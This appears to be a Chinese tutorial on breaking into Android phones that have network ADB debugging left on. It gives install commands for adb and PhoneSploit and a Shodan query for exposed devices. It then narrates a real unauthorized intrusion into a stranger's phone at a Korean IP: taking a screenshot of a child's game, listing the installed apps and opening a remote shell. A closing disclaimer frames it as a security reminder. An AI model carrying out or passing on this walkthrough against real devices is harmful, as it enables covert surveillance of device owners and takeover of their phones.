Android 调试模式 (adb) 一般情况下,是没有开启的。adb 通过 USB 与设备进行通信,但是也可以开启WIFI进行连接手机,进行远程的调试。由于开启了链接wifi的调试,从而被黑客利用并监控你的手机的所有行为。
下面我们来演示一下如何利用adb入侵Android手机
首先我们需要两个工具: adb 和 PhoneSploit
kali 安装 adb 工具 :
apt-get install adb adb tcpip 5555 adb connect 1.1.1.1(测试机可以省略,只要用来测试adb是否正常)Kali 安装 PhoneSploit:
git clone https://github.com/Zucccs/PhoneSploit cd PhoneSploit pip install colorama工具装好之后,我们打开shodan搜一波,搜索关键字为:android debug bridge product:”Android Debug Bridge”
能搜出来好多,我这里就截一点图,然后我们拿那个韩国的IP做一个测试
首先,测试一下它的5555端口是不是正常开启的
可以看到是正常开启的,那接下来,我们启动工具,启动命令为python main_linux.py连接这个IP地址,如下图
可以看到连接成功
接下来,这个工具有一堆的菜单功能
通过输入对应的数字,就能调用功能,这里我们试试截屏,键入7,可以看到,已经成功,并将截屏保存在了工具所在的目录下
我们打开文件看一下
发现熊孩子在打游戏,我们还可以看看这台设备都安装了哪些APP,键入14
可以看到有一堆的APP,当然还有很多功能,功能菜单有两页, 按p键可以翻页、b键可以回到第一页
我们也可以直接进入设备的shell中,键入4,进入shell
可以执行系统命令
当然,只要你的姿势够骚,还有更有意思的玩法这里就不细说了
最后的结语:不要随便去搞破坏,只是提醒大家不要随便开启自己的调式模式,本文只用于学习研究,不能用于非法用途,否则后果自负。。。。
评论